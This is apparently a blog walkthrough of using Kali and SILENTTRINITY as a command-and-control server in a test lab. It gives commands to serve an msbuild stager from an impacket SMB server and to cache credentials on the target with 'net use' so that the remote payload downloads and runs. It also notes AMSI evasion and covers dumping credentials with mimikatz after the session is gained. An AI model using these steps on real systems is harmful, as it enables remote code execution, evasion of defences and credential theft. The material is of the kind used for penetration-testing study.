Using Kali as a C2 Server
git clone https://github.com/SecureAuthCorp/impacket.git
pip install -r requirements.txt
python setup.py install
apt install python3.7 python3.7-dev python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
python3.7 -m pip install -r requirements.txt
#Start it up
Ready to go
Proceed with selecting a listener, binding it to an IP + port and starting it. And btw I set my BindIP to a different subnet because I am connected to my test lab using VPN. Nothing magic going on.
set BindIP 10.0.8.6
Proceed to generate a stager. It will end up in the
Now, find an appropriate way of downloading and triggering the stager. As per November 2018, the msbuild stager payloads still haven't triggered AMSI on Windows 10 1803.
A neat trick is using an SMB server for serving the payload. Download and trigger it it with
msbuildand the UNC path to your SMB server as argument.
First create a share folder and then start the SMB server from impacket.
smbserver.py SMB /opt/SMB -username hacker -password hacker -smb2support -ip 10.0.8.6
Now we try to trigger the payload with msbuild, but it fails because we aren't authenticated.
cp /opt/SILENTTRINITY/Server/msbuild.xml /opt/SMB/msbuild.xml
So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default. And as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and find a little trick to cache some credentials for my SMB server on the host. As you see I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated
net usecommand. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn’t ideal, so if you have suggestions please reach out.
net use \\10.0.8.6\smb /user:hacker hacker
We see that we get a successful authentication and a NetNTLMv2 hash instantly. So now with cached credentials on the target, let's try to trigger our payload again.
Voila! Something started happening. Let's check back in ST.
Like sweet magic, we got a session. The authentication reuses the credentials that were cached.
Now we list the session we just acquired. Because I triggered the payload from an elevated shell, we have a session with elevated privileges. That allows us to do things like dump credentials and other kinds of post exploitation fun.
So let's explore some of the post exploitation modules that ST has to offer. As you can see, ST has a lot of built in modules already and by the looks of it, there are more to come.
Let's select the
mimikatzmodule and run it towards our session. Word of notice here, you have to copy the GUID from the session list so you have it ready. You can alternatively use
run allto run it on all session, if you have several sessions.
Running the shell module for good measure
set Command whoami
set Assembly /opt/Watson.exe
Didn't find anything on my patched Windows 10 1803 VM, but that's ok.